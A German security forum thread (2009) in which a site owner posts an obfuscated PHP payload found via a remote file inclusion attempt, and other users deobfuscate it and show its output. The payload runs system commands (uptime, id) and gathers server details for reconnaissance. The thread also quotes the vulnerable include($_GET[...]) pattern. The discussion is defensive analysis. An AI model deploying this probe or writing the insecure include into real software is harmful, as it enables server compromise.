Opfer von XSS angriff?

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Fuselmeister, 28. November 2009 .

Schlagworte:
  1. 28. November 2009
    Hi ich hab vorhin in der Log von meinem Webspace was interessantes gesehen:
    Könnte das ein versuchter Angriff mit XSS sein? Funktionieren tut das nich, weil ich Teile der Seite nicht mit <?php include($_GET['dsp']); ?> einbinde, würde mich aber interessieren obs wirklich eine attacke wahr...

    in der cmdstate.txt, die offensichtlich eingebunden werden sollte, steht das hier drin:
    Spoiler
    Code:
    <?php
$x1c="\x64\151\163k\146\162\145e\x73\160\x61\x63\x65"; 
$x1d="\144i\163\x6b_\164o\164a\154\137\x73\160\x61ce"; 
$x1e="\x67\145\x74\x63\x77d"; 
$x1f="\x67e\164\x65\x6e\166"; 
$x20="\x67\145t\150\157s\x74by\156\x61\155\145";
$x21="\x70\150\x70\x5fu\x6e\141\155e";
$x22="\x70\x68\x70\166e\162\163\x69\157n";
$x23="\163\x70r\x69\x6et\x66";
$x24="\163tr\154e\x6e";
$x25="\x73y\163\164\x65\155"; 

function ConvertBytes($x0b){
global $x1c,$x1d,$x1e,$x1f,$x20,$x21,$x22,$x23,$x24,$x25;
$x0c = $x24($x0b);
if($x0c < 4){return $x23("\045d\040\142", $x0b);}

if($x0c >= 4 && $x0c <=6){return $x23("\045\x30.\x32f\040K\142", $x0b/1024);}

if($x0c >= 7 && $x0c <=9)
{return $x23("%\x30\056\x32\x66 \115b", $x0b/1024/1024);}

return $x23("%0\x2e\062\146 Gb", $x0b/1024/1024/1024); }

echo "\x66\151\147\x62a\x79\x69\154\157\146i\x6cogba<\x62r\076";

$x0d = @$x21();
$x0e = $x25(uptime);
$x0f = $x25(id);
$x10 = @$x1e();
$x11 = $x1f("\x53\x45\122\x56\x45\122\x5f\x53O\106\124\x57A\122\105");
$x12 = $x22();
$x13 = $_SERVER['SERVER_NAME'];
$x14 = $x20($x15);
$x16= $x1c($x10);$x17 = ConvertBytes($x1c($x10));
if (!$x17) {$x17 = 0;}
$x18= $x1d($x10);
$x19 = ConvertBytes($x1d($x10));
if (!$x19) {$x19 = 0;}
$x1a = ConvertBytes($x18-$x16);
$x1b = @PHP_OS;
echo "\146\x69\x67\142\x61y\x69\x6co\146i\x6c\x6fg\x62\x61\074\142\162\076";
echo "\165n\141\x6d\145 -\141: $x0d<\x62\162\x3e";
echo "os\072 $x1b\x3c\x62\162\x3e";
echo "\165\x70\164i\155\x65\072 $x0e<\x62\x72\076";
echo "\x69d\072 $x0f<\142\x72>";
echo "\160w\x64\x3a $x10<\x62r>";echo "p\150p\x3a\040$x12\x3c\x62\162>";
echo "\163\x6f\x66\x74\167a\162\x65:\x20$x11\x3c\x62\162>";
echo "\x73\x65r\x76\x65r\x2d\x6e\141\155\145\x3a\x20$x13\074\142\162\076";
echo "s\145\x72ver\x2d\x69p\072 $x14\x3c\x62\162\x3e";echo "f\162\145\145:\040$x17<br\x3e";
echo "u\163\145d\072\040$x1a\074b\x72>";
echo "to\164\141\x6c:\x20$x19<\142\x72>";
exit;
?>

    kennt sich da einer näher mit aus?^^

    mfg
    Fuselmeister
     
    + Multi-Zitat Zitieren
  3. 28. November 2009
    AW: Opfer von XSS angriff?

    Das war keine xss sondern eine rfi. (remote file inclusion)
    sinn einer rfi ist code in den webserver einzuschleusen und auszuführen. (zb eine php shell oder schadcode)
    dies gelingt aber natürlich nur wenn die aufgerufene php ne lücke hat und du ungünstige php settings hast.
     
    + Multi-Zitat Zitieren
  4. 28. November 2009
    AW: Opfer von XSS angriff?

    Mich würde mal interessieren, was der Code macht....
    Kann das jemand "entschlüsseln"?

    so long
    pampers
     
    + Multi-Zitat Zitieren
  5. 28. November 2009
    AW: Opfer von XSS angriff?

    Code:
    figbayilofilogba
figbayilofilogba
uname -a: Windows NT *_NAME DES BENUTZERS_* 5.1 build 2600
os: WINNT
uptime:
id:
pwd: C:\xampp\htdocs
php: 5.2.8
software: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8
server-name: localhost
server-ip: 192.168.0.3
free: 26.74 Gb
used: 139.27 Gb
total: 166.02 Gb
    Kommt dabei raus.

    Ist natürlich über Xampp ausgeführt worden.
     
    + Multi-Zitat Zitieren
  6. 28. November 2009
    AW: Opfer von XSS angriff?

    Das Script ist nur dazu da, um einen möglichen Angriff auf deinen Server zu starten. Dabei sammelt das Script verschiedene Informationen über deinen Server, wie z.B. die komplette Ausgabe von uname, Serverkonfigurationsdatei, um was für einen Server es sich handelt, etc.
    Der Hexadezimalcode wird dabei nur verwendet, um das komplette Script unleserlich zu machen...
     
    + Multi-Zitat Zitieren
  7. 28. November 2009
    AW: Opfer von XSS angriff?

    PHP:
    <? php

    function  ConvertBytes ( $x0b ){
    [...]      Berechnet Speicherplatz etc .
    }

    echo      "figbayilofilogba<br>" ;
    echo      "figbayilofilogba<br>" ;
    echo      "uname -a: @php_uname()<br>" ;
    echo      "os: @PHP_OS<br>" ;
    echo      "uptime: system(uptime)<br>" ;
    echo      "id: system(id)<br>" ;
    echo      "pwd: @getcwd()<br>" ;
    echo      "php: phpversion()<br>" ;
    echo      "software: getenv('SERVER_SOFTWARE')<br>" ;
    echo      "server-name:  $_SERVER [ 'SERVER_NAME']<br>" ;
    echo      "server-ip: gethostbyname( $x15 )<br>" ;
    echo      "free: ConvertBytes( $x1c ( $x10 ))"
    echo  "used: ConvertBytes( $x18 - $x16 )<br>" ;
    echo      "total:  $x19 (Ergibt sich aus Funktion ConvertBytes( $x1d ( $x10 )))<br>" ;
    exit;

    ?>
    Hätte editiert, aber da der Beitrag noch nicht freigeschaltet wurde, "musste" ich es nun so machen.

    Skript liest nur Sachen aus und parst danach wahrscheinlich nen paar Sachen um Lücken zu finden. Sollte bei einer normalen Konfiguration aber nicht wirklich funktionieren.
     
    + Multi-Zitat Zitieren
  8. 28. November 2009
    AW: Opfer von XSS angriff?

    das script würde alle möglichen system-infos ausgeben

    PHP:
    function  ConvertBytes ( $x0b ) {
     $x0c  strlen ( $x0b );
    if(     $x0c  4 ){return  sprintf ( "%d" $x0b );}

    if(     $x0c  >=  &&  $x0c  <= 6 ){return  sprintf ( "%0.2f Kb" $x0b / 1024 );}

    if(     $x0c  >=  &&  $x0c  <= 9 )
    {return      sprintf ( "%0.2f Mb" $x0b / 1024 / 1024 );}

    return      sprintf ( "%0.2f Gb" $x0b / 1024 / 1024 / 1024 ); }

     $x0d  = @ php_uname ();
     $x0e  system ( uptime );
     $x0f  system ( id );
     $x10  = @ getcwd ();
     $x11  getenv ( "SERVER_SOFTWARE" );
     $x12  phpversion ();
     $x13  $_SERVER [ 'SERVER_NAME' ];
     $x14  gethostbyname ( $x15 );
     $x16 diskfreespace ( $x10 );
     $x17  ConvertBytes ( diskfreespace ( $x10 ));
    if (!     $x17 ) { $x17  0 ;}
     $x18 disk_total_space ( $x10 );
     $x19  ConvertBytes ( $x1d ( $x10 ));
    if (!     $x19 ) { $x19  0 ;}
     $x1a  ConvertBytes ( $x18 - $x16 );
     $x1b  = @ PHP_OS ;
    echo      "figbayilofilogba" ;
    echo      "uname -a:  $x0d <br>" ;
    echo      "os:  $x1b <br>" ;
    echo      "uptime:  $x0e <br>" ;
    echo      "id:  $x0f <br>" ;
    echo      "pwd:  $x10 <br>" ;
    echo      "php:  $x12 <br>" ;
    echo      "software:  $x11 <br>" ;
    echo      "server-name:  $x13 <br>" ;
    echo      "server-ip:  $x14 <br>" ;
    echo      "free:  $x17 <br>" ;
    echo      "used:  $x1a <br>" ;
    echo      "total:  $x19 <br>" ;
    exit;
    Code:
    uname -a: Windows NT xxx 6.1 build 7600 ((null)) i586
os: WINNT
uptime:
id:
pwd: D:\Programme\xampplite\htdocs\
php: 5.3.0
software: Apache/2.2.12 (Win32) DAV/2 mod_ssl/2.2.12 OpenSSL/0.9.8k mod_autoindex_color PHP/5.3.0
server-name: localhost
server-ip: 192.168.2.100
free: 176.64 Gb
used: 423.95 Gb
total: 600.59 Gb
     
    + Multi-Zitat Zitieren
  9. 29. November 2009
    AW: Opfer von XSS angriff?

    THX für die Infos... BWs sind raus, soweit es ging

    ich werd mal die Log auf Aktivitäten von 212.159.7.145 im Auge behalten...

    mfg
     
    + Multi-Zitat Zitieren
  10. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.

Auf dieses Thema antworten